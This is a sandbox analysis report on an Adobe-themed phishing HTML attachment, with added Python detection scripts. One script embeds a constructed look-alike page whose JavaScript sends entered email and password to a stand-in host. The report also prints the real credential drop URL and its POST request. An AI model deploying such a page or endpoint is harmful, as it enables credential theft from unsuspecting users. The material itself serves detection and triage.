
Windows Analysis Report
Final Contract.htm

Overview

General Information

Sample name: Final Contract.htm
Analysis ID: 1620402
MD5: dc32622e2c5c707092e455cd5c265232
SHA1: 15df085fe5315207843ed47ecf54b2d25e733ed5
SHA256: 038e29831b56f5910206b6dd157cbdfbda80c9c30d5f5cb395a5c01d0502f91a

Detection

HTMLPhisher
Score: 76
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML file submission containing password form
Suspicious Javascript code found in HTML file
Detected hidden input values containing email addresses (often used in phishing pages)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 5328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Final Contract.htm" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 3580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2216,i,4583716381143380160,5174444017956621571,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
Source              Rule                      Description                 Author        Strings
Final Contract.htm  JoeSecurity_HtmlPhish_10  Yara detected HtmlPhish_10  Joe Security  (none listed)
1.1.pages.csv       JoeSecurity_HtmlPhish_10  Yara detected HtmlPhish_10  Joe Security  (none listed)
1.0.pages.csv       JoeSecurity_HtmlPhish_10  Yara detected HtmlPhish_10  Joe Security  (none listed)
        No Sigma rule has matched
Timestamp                         SID      Severity  Classtype                             Source IP      Src Port  Destination IP  Dst Port  Protocol
2025-02-20T23:21:29.333054+0100   2025005  1         Successful Credential Theft Detected  66.206.36.128  443       192.168.2.6     49927     TCP
2025-02-20T23:21:41.428068+0100   2025005  1         Successful Credential Theft Detected  66.206.36.128  443       192.168.2.6     50003     TCP
2025-02-20T23:21:50.210386+0100   2025005  1         Successful Credential Theft Detected  66.206.36.128  443       192.168.2.6     50008     TCP
2025-02-20T23:21:29.332838+0100   2031566  1         Successful Credential Theft Detected  192.168.2.6    49927     66.206.36.128   443       TCP
2025-02-20T23:21:41.427532+0100   2031566  1         Successful Credential Theft Detected  192.168.2.6    50003     66.206.36.128   443       TCP
2025-02-20T23:21:50.209633+0100   2031566  1         Successful Credential Theft Detected  192.168.2.6    50008     66.206.36.128   443       TCP
2025-02-20T23:21:29.332838+0100   2812237  1         Successful Credential Theft Detected  192.168.2.6    49927     66.206.36.128   443       TCP
2025-02-20T23:21:41.427532+0100   2812237  1         Successful Credential Theft Detected  192.168.2.6    50003     66.206.36.128   443       TCP
2025-02-20T23:21:50.209633+0100   2812237  1         Successful Credential Theft Detected  192.168.2.6    50008     66.206.36.128   443       TCP

Phishing

Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.0.pages.csv
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.1.pages.csv
Source: Yara match | File source: Final Contract.htm, type: SAMPLE
Source: Yara match | File source: 1.1.pages.csv, type: HTML
Source: Yara match | File source: 1.0.pages.csv, type: HTML
Source: 0.0.id.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Final%20Contract... This script demonstrates several high-risk behaviors, including data exfiltration, dynamic code execution, and the use of obfuscated URLs. The script collects user email and password credentials and sends them to a suspicious third-party domain, which is a clear indication of malicious intent. Additionally, the script attempts to redirect the user to a different domain after a certain number of failed login attempts, further suggesting phishing or other malicious activities. Overall, this script poses a significant security risk and should be treated with caution.
Source: Final Contract.htm | HTTP Parser: location.href
Source: Final Contract.htm | HTTP Parser: .location
Source: Final Contract.htm | HTTP Parser: .location
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: sj6f1k@nxl.co
Source: Final Contract.htm | HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: Number of links: 0
Source: Final Contract.htm | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: Final Contract.htm | HTTP Parser: Title: Adobe Secured File does not match URL
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: Title: Adobe Secured File does not match URL
Source: Final Contract.htm | HTTP Parser: Invalid link: Privacy & Cookies
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: Invalid link: Privacy & Cookies
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: Invalid link: Privacy & Cookies
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: Has password / email / username input fields
Source: Final Contract.htm | HTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: <input type="password" .../> found
Source: Final Contract.htm | HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: No favicon
Source: Final Contract.htm | HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: No <meta name="author".. found
Source: Final Contract.htm | HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6, version: TLS 1.2, on local ports 49709, 49731, 49822, 49946, 50009, 50012, 50014, 50015
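The HTTP Parser and AI findings above (a password input with no form action, a hidden input holding an e-mail address, a title that does not match the URL, a location.href redirect, zero good links, and a POST to a third-party domain) are static checks that can be re-run on any suspicious .htm attachment before it is opened. The script below is an added example, not part of the Joe Sandbox report or of Joe Sandbox itself: a stdlib-only Python triage that applies those heuristics. SAMPLE_HTML and BENIGN_HTML are constructed look-alikes written for the example (phish-kit.example, victim@example.com and login.example.com are made up); the real markup of "Final Contract.htm" is not reproduced in the report.

```python
"""Static phishing-page triage (added example; stdlib only).

Re-implements the HTML-parser heuristics listed in the report on a constructed
look-alike page. SAMPLE_HTML, BENIGN_HTML and every host name in them are made
up for this example; they are NOT the markup of "Final Contract.htm".
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
# window.location = ..., location.href = ..., but not a comparison (==)
REDIRECT_RE = re.compile(r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=(?!=)")
# a .php endpoint inside a /wp-*/ folder, the shape the ET "Terse POST to
# Wordpress Folder" alert in the report is built around
WP_PHP_RE = re.compile(r"/wp-[^/]*/.*\.php$")


def _attr(attrs, name):
    return (attrs.get(name) or "").strip()


class PageFeatures(HTMLParser):
    """Collects <title>, <input>s, <form action>s, <a href>s and inline scripts."""

    def __init__(self):
        super().__init__()
        self.title, self.inputs, self.form_actions, self.links, self.scripts = "", [], [], [], []
        self._in_title = self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")
        elif tag == "input":
            self.inputs.append(a)
        elif tag == "form":
            self.form_actions.append(_attr(a, "action"))
        elif tag == "a":
            self.links.append(_attr(a, "href"))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        elif self._in_script:
            self.scripts[-1] += data


def triage(html, page_url):
    """Return the heuristic findings plus a score (number of triggered checks)."""
    p = PageFeatures()
    p.feed(html)
    p.close()
    script = "\n".join(p.scripts)
    page_host = (urlparse(page_url).hostname or "").lower()  # "" for file:// pages
    has_password = any(_attr(i, "type").lower() == "password" for i in p.inputs)
    hidden_emails = [_attr(i, "value") for i in p.inputs
                     if _attr(i, "type").lower() == "hidden" and EMAIL_RE.search(_attr(i, "value"))]
    title_words = [w.lower() for w in re.findall(r"[A-Za-z]{3,}", p.title)]
    urls = sorted(set(URL_RE.findall(script)))
    f = {
        "password_without_form_action": has_password and not any(p.form_actions),
        "hidden_email_values": hidden_emails,
        "title_mismatch": bool(title_words) and not any(w in page_host for w in title_words),
        "location_redirect": bool(REDIRECT_RE.search(script)),
        "script_urls": urls,
        "wp_php_endpoints": [u for u in urls if WP_PHP_RE.search(urlparse(u).path)],
        "good_links": sum(1 for h in p.links if h.lower().startswith(("http://", "https://"))),
    }
    checks = [f["password_without_form_action"], bool(hidden_emails), f["title_mismatch"],
              f["location_redirect"], bool(f["wp_php_endpoints"]), f["good_links"] == 0]
    f["score"] = sum(checks)
    f["verdict"] = "likely phishing" if f["score"] >= 4 else "inconclusive"
    return f


# constructed look-alike of the pattern the report describes (not the real sample)
SAMPLE_HTML = """<!DOCTYPE html><html><head><title>Adobe Secured File</title></head><body>
<a href="#">Privacy &amp; Cookies</a>
<input type="hidden" id="tgt" value="victim@example.com">
<input type="email" id="email" value="victim@example.com">
<input type="password" id="pass" placeholder="Password">
<button onclick="go()">View Document</button>
<script>
var attempts = 0;
function go() {
  var body = "email=" + encodeURIComponent(document.getElementById("email").value) +
             "&password=" + encodeURIComponent(document.getElementById("pass").value);
  fetch("https://phish-kit.example/wp-kit/adobe.php", {method: "POST", body: body,
        headers: {"Content-Type": "application/x-www-form-urlencoded"}});
  if (++attempts >= 3) { window.location.href = "https://www.adobe.com/"; }
}
</script></body></html>"""
SAMPLE_URL = "file:///C:/Users/user/Desktop/Final%20Contract.htm"

# constructed benign control: real form action, title matches host, one good link
BENIGN_HTML = """<html><head><title>Example Login</title></head><body>
<form action="/session" method="post">
<input type="email" name="email"><input type="password" name="password">
</form>
<a href="https://login.example.com/privacy">Privacy</a>
</body></html>"""

if __name__ == "__main__":
    for name, html, url in (("sample", SAMPLE_HTML, SAMPLE_URL),
                            ("benign", BENIGN_HTML, "https://login.example.com/")):
        print(name, triage(html, url))
```

The score threshold and the check list are deliberately simple; the point is that each of the report's HTTP Parser lines corresponds to one cheap, offline check, and that a page opened from file:// has no host at all, so any absolute URL in its script is cross-origin by construction.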

Networking

Source: Network traffic | Suricata IDS: 2031566 - Severity 1 - ET PHISHING Terse POST to Wordpress Folder - Probable Successful Phishing : 192.168.2.6:49927 -> 66.206.36.128:443
Source: Network traffic | Suricata IDS: 2031566 - Severity 1 - ET PHISHING Terse POST to Wordpress Folder - Probable Successful Phishing : 192.168.2.6:50008 -> 66.206.36.128:443
Source: Network traffic | Suricata IDS: 2031566 - Severity 1 - ET PHISHING Terse POST to Wordpress Folder - Probable Successful Phishing : 192.168.2.6:50003 -> 66.206.36.128:443
Source: global traffic | TCP traffic: 192.168.2.6:49968 -> 1.1.1.1:53
Source: Joe Sandbox View | IP Address: 199.232.192.193
Source: Joe Sandbox View | IP Address: 199.232.196.193
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: Joe Sandbox View | ASN Name: TURNKEY-INTERNETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.6:49927 -> 66.206.36.128:443
Source: Network traffic | Suricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.6:50008 -> 66.206.36.128:443
Source: Network traffic | Suricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.6:50003 -> 66.206.36.128:443
Source: Network traffic | Suricata IDS: 2025005 - Severity 1 - ET PHISHING Possible Successful Generic Phish Jan 14 2016 : 66.206.36.128:443 -> 192.168.2.6:49927
Source: Network traffic | Suricata IDS: 2025005 - Severity 1 - ET PHISHING Possible Successful Generic Phish Jan 14 2016 : 66.206.36.128:443 -> 192.168.2.6:50003
Source: Network traffic | Suricata IDS: 2025005 - Severity 1 - ET PHISHING Possible Successful Generic Phish Jan 14 2016 : 66.206.36.128:443 -> 192.168.2.6:50008
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 (listed 7 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 (listed 42 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (listed once)
Source: global traffic | HTTP traffic detected:
    GET /gOkYzuw.png HTTP/1.1
    Host: i.imgur.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /gOkYzuw.png HTTP/1.1
    Host: i.imgur.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | DNS traffic detected: DNS query: i.imgur.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: airtekincheatingandcooling.com
Source: unknown | HTTP traffic detected:
    POST /wp-induc/adobe.php HTTP/1.1
    Host: airtekincheatingandcooling.com
    Connection: keep-alive
    Content-Length: 59
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-platform: "Windows"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Origin: null
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: Final Contract.htm | String found in binary or memory: https://airtekincheatingandcooling.com/wp-induc/adobe.php
Source: Final Contract.htm | String found in binary or memory: https://i.imgur.com/gOkYzuw.png
Source: unknown | Network traffic detected: HTTP traffic on port 443 (both directions) with local ports 49672, 49673, 49674, 49703, 49706, 49708, 49709, 49714, 49717, 49725, 49731, 49748, 49822, 49927, 49946, 50003, 50008, 50009, 50011, 50012, 50014, 50015
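All three Suricata alerts fire on the same request: a short form-urlencoded POST to a .php file under a /wp-…/ folder on a WordPress-looking host, carrying Origin: null (what Chrome sends for a cross-origin request from an opaque origin, here a page opened from file://) and no Referer. The script below is an added example, not part of the report or of Joe Sandbox: it restores line breaks to the request head printed above (header list trimmed) and applies those checks, then decodes and redacts the form body so the record can go into a ticket. The body itself is not in the report, only Content-Length: 59, so SAMPLE_BODY is a constructed 59-byte form body with a made-up password standing in for it.

```python
"""Triage of a credential-exfiltration POST (added example; stdlib only).

REQUEST_HEAD is the POST from the report with line breaks restored and the
header list trimmed. The body is not in the report (only Content-Length: 59),
so SAMPLE_BODY is a constructed 59-byte form body standing in for it.
"""
import re
from urllib.parse import parse_qs, urlsplit

REQUEST_HEAD = (
    "POST /wp-induc/adobe.php HTTP/1.1\r\n"
    "Host: airtekincheatingandcooling.com\r\n"
    "Connection: keep-alive\r\n"
    "Content-Length: 59\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept: */*\r\n"
    "Origin: null\r\n"
    "Sec-Fetch-Site: cross-site\r\n"
    "Sec-Fetch-Mode: cors\r\n"
    "Sec-Fetch-Dest: empty\r\n"
    "\r\n"
)
# constructed: the report does not show the real body, only its length (59)
SAMPLE_BODY = "email=victim%40example.com&password=Spring2025%21&btn=Login"

WP_FOLDER_RE = re.compile(r"^/wp-[^/]*/")
SENSITIVE = ("pass", "pwd", "email", "user", "login")
SECRET = ("pass", "pwd")


def parse_request(head):
    """Split a request head into method, target and a lower-cased header dict."""
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def triage_post(head, body):
    """Flag the traits the ET 'Terse POST to Wordpress Folder' style alerts key on."""
    method, target, h = parse_request(head)
    declared = int(h.get("content-length", "0"))
    fields = parse_qs(body, keep_blank_values=True)
    f = {
        "post_to_wp_folder": method == "POST" and bool(WP_FOLDER_RE.match(urlsplit(target).path)),
        "form_urlencoded": h.get("content-type", "").startswith("application/x-www-form-urlencoded"),
        "terse_body": declared < 256,
        # Chrome sends "Origin: null" for cross-origin requests from an opaque
        # origin, e.g. a page opened from file:// (an .htm e-mail attachment)
        "opaque_origin": h.get("origin") == "null",
        "no_referer": "referer" not in h,
        # a captured body shorter than the declared length means the capture is truncated
        "length_consistent": declared == len(body.encode()),
        "sensitive_fields": sorted(k for k in fields if any(s in k.lower() for s in SENSITIVE)),
        # masked copy that is safe to paste into a ticket
        "redacted_fields": {k: ("*" * len(v[0]) if any(s in k.lower() for s in SECRET) else v[0])
                            for k, v in fields.items()},
    }
    f["probable_credential_theft"] = all([f["post_to_wp_folder"], f["form_urlencoded"],
                                          f["terse_body"], bool(f["sensitive_fields"])])
    return f


if __name__ == "__main__":
    for k, v in triage_post(REQUEST_HEAD, SAMPLE_BODY).items():
        print(f"{k}: {v}")
```

For hunting in proxy or NSM logs, the same four conditions (POST, path matching ^/wp-[^/]*/, form-urlencoded, small body) with Origin: null or a missing Referer are what separate this kind of kit from ordinary WordPress admin traffic, which carries a same-site Origin and a Referer from wp-admin.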
Source: classification engine | Classification label: mal76.phis.winHTM@26/3@8/7
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Final Contract.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2216,i,4583716381143380160,5174444017956621571,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (listed 23 times; child processes whose command line the sandbox did not resolve)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2216,i,4583716381143380160,5174444017956621571,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Stealing of Sensitive Information

Source: file:///C:/Users/user/Desktop/Final%20Contract.htm | HTTP Parser: file:///C:/Users/user/Desktop/Final%20Contract.htm
MITRE ATT&CK matrix, transposed to one row per tactic. Techniques followed by a number in parentheses are the ones the report's signatures matched (the number is the match count); the remaining entries are the unmatched placeholder cells of the matrix.

Tactic                 Techniques
Reconnaissance         Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development   Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access         Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution              Windows Management Instrumentation; Scheduled Task/Job; At; Cron
Persistence            Browser Extensions (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Privilege Escalation   Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Defense Evasion        Masquerading (2); Process Injection (1); Obfuscated Files or Information; Binary Padding
Credential Access      OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery              System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
Lateral Movement       Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection             Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control    Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Ingress Tool Transfer (1)
Exfiltration           Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact                 Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction